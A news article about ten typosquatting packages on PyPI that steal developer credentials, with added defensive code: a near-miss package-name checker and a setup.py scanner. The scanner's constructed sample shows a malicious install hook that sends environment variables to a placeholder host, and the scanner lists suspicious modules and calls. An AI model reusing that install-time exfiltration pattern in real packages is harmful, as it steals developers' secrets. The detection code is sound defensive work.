Malicious Python libraries that hide security threats discovered on PyPI
Threat actors are using typosquatting to attack Python developers with malware, researchers said.
Researchers at Spectralops.io recently scanned PyPI, the package repository for Python developers, and found ten malicious packages on the platform. Each was given a name almost identical to that of a legitimate package, so that a developer who mistypes or misreads the name downloads and adopts the tainted one instead.
This type of attack is called typosquatting and is common among cybercriminals. It is not used only on code repositories (there have been plenty of examples on GitHub, for instance), but also in phishing emails and fake websites, usually as a lure for data theft.
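The lure works because a near-miss name is hard to spot by eye. The following is an added example, not code from the Spectralops report: a small check that flags a requested package name sitting within a short edit distance of a well-known name, including the "py"/"python" prefix and suffix trick. KNOWN_PACKAGES is a constructed, deliberately short allow-list and the distance thresholds are illustrative choices; in practice you would seed the list from your own lock files.

```python
"""Flag a package name that is a near-miss of a well-known PyPI package name.

Added example, not from the Spectralops report. KNOWN_PACKAGES is a constructed,
deliberately short allow-list; the distance thresholds are illustrative choices.
"""
import re

# Constructed sample of names a developer expects to install (extend from your own lock files).
KNOWN_PACKAGES = {"requests", "numpy", "pandas", "protobuf", "pyyaml", "urllib3", "colorama"}


def normalize(name: str) -> str:
    """PEP 503 normalisation: lowercase and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def strip_affixes(name: str) -> str:
    """Drop a leading/trailing 'py'/'python' lure ('pyprotobuf', 'protobuf-py')."""
    for prefix in ("python-", "python", "py-", "py"):
        if name.startswith(prefix) and len(name) - len(prefix) >= 3:
            name = name[len(prefix):]
            break
    for suffix in ("-python", "python", "-py", "py"):
        if name.endswith(suffix) and len(name) - len(suffix) >= 3:
            name = name[: -len(suffix)]
            break
    return name


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) using two rolling rows."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, known=KNOWN_PACKAGES):
    """Return [(known_name, distance), ...] that `name` is suspiciously close to.

    An exact match after normalisation is the real package, so it yields [].
    Short names get a tighter threshold (one edit for names of five characters
    or fewer, two edits otherwise) to keep false positives down.
    """
    n = normalize(name)
    if n in known:
        return []
    hits = []
    for k in known:
        d = min(levenshtein(n, k), levenshtein(strip_affixes(n), k))
        if d <= (1 if len(k) <= 5 else 2):
            hits.append((k, d))
    return sorted(hits, key=lambda h: (h[1], h[0]))


if __name__ == "__main__":
    for candidate in ("requests", "reqeusts", "pyprotobuf", "nmpy", "django"):
        print(candidate, "->", typosquat_candidates(candidate))
```

Run it against every name in a requirements file before the first install, and treat any hit as a prompt to open the PyPI page and compare maintainer, release history and download counts with the package you actually meant.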
Thousands of developers threatened
If victims adopted these packages, they were handing threat actors the keys to their realm: the malware steals private data as well as developer credentials and sends them to a third-party server, with the victim never knowing it happened. PyPI, Spectralops notes, has over 600,000 active users, so the potential attack surface is large.
“These attacks rely on the fact that the Python installation process can include arbitrary code snippets, which are a place where malicious players can put their malicious code,” explained Ori Abramovsky, Data Science Lead at Spectralops.io. “We discovered this by using machine learning models that analyze the code of these packages and automatically alert the bad guys.”
The packages named in the report are:
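The "arbitrary code snippets" Abramovsky refers to are the package's own setup.py, which pip executes during installation, before a single line of the library is ever imported. As an added example (not Spectralops' tooling, which used machine-learning models, and not code from the packages named here), the block below shows a constructed setup.py that hooks the install command to harvest environment variables, next to a plain AST heuristic that flags the tell-tale signs: setuptools command subclasses, a cmdclass override in setup(), network and encoding imports, os.environ reads, and long string literals. SAMPLE_SETUP_PY and BENIGN_SETUP_PY are constructed inputs, and example.invalid is a reserved placeholder host, not a real endpoint.

```python
"""Static pre-install triage of a setup.py for install-time code execution.

Added example, not Spectralops' tooling (they used ML models): this is a plain
AST heuristic. SAMPLE_SETUP_PY and BENIGN_SETUP_PY are constructed inputs;
example.invalid is a reserved placeholder host, not a real endpoint.
"""
import ast

# Constructed: a typosquat whose custom install command harvests environment
# variables (where CI tokens and cloud keys often live) during `pip install`.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import os, base64, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        blob = base64.b64encode(repr(dict(os.environ)).encode())
        urllib.request.urlopen("http://example.invalid/collect", data=blob)

setup(name="reqeusts", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed: an ordinary setup.py with no install hooks.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="mypkg", version="1.0", packages=["mypkg"])
'''

# Modules and builtins that have no business in package metadata.
SUSPICIOUS_MODULES = {"subprocess", "socket", "urllib", "requests", "http",
                      "base64", "ctypes", "marshal", "zlib"}
SUSPICIOUS_CALLS = {"exec", "eval", "compile", "__import__"}
SUSPICIOUS_OS_ATTRS = {"environ", "getenv", "system", "popen"}


def scan_setup_py(source: str) -> list[tuple[int, str]]:
    """Return sorted (line, reason) findings for a setup.py source string."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.add((node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            mod = node.module or ""
            if mod.split(".")[0] in SUSPICIOUS_MODULES:
                findings.add((node.lineno, f"imports from {mod}"))
            # Subclassing a setuptools/distutils command is how code gets run
            # by `pip install` itself, before any module of the package is imported.
            if mod.startswith(("setuptools.command", "distutils.command")):
                findings.add((node.lineno, f"imports install hook base {mod}"))
        elif isinstance(node, ast.Call):
            fn = node.func
            if isinstance(fn, ast.Name) and fn.id in SUSPICIOUS_CALLS:
                findings.add((node.lineno, f"calls {fn.id}()"))
            if isinstance(fn, ast.Name) and fn.id == "setup":
                if any(kw.arg == "cmdclass" for kw in node.keywords):
                    findings.add((node.lineno, "setup() overrides cmdclass"))
        elif isinstance(node, ast.Attribute):
            # os.environ / os.getenv reads are how credentials get harvested.
            if (isinstance(node.value, ast.Name) and node.value.id == "os"
                    and node.attr in SUSPICIOUS_OS_ATTRS):
                findings.add((node.lineno, f"touches os.{node.attr}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if len(node.value) > 200:
                findings.add((node.lineno, "long string literal (encoded payload?)"))
    return sorted(findings)


def is_suspicious(source: str) -> bool:
    """Triage verdict: any finding at all is reason to read the file by hand."""
    return bool(scan_setup_py(source))


if __name__ == "__main__":
    for line, reason in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"line {line}: {reason}")
```

Point it at the setup.py of an sdist you have unpacked yourself. Fetch the archive from the file URL PyPI publishes and unpack it with tarfile rather than relying on pip download, because pip may still run setup.py to prepare metadata for an sdist even with --no-deps. Treat the result as triage, not proof: a setup.py with no findings can still import a malicious module at runtime, and a custom build backend declared in pyproject.toml can run code at install time just as setup.py can.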
- Pyg-utils, Pymocks and PyProto2
- Free-net-vpn and Free-net-vpn2
The researchers contacted PyPI, which removed the malicious packages from the repository shortly afterwards. Developers who installed them in the past remain at risk, however: because the code ran at install time with the developer's own privileges, they should uninstall the packages and rotate their passwords, API tokens and any other credentials that were present on the affected machine, just in case.
“What’s remarkable here is how common these malicious packages are,” Abramovsky continued. “They are simple, but dangerous. Personally, once I encountered these types of attacks, I started double-checking every Python package I use. Sometimes I even download it and manually observe its code before installing it.”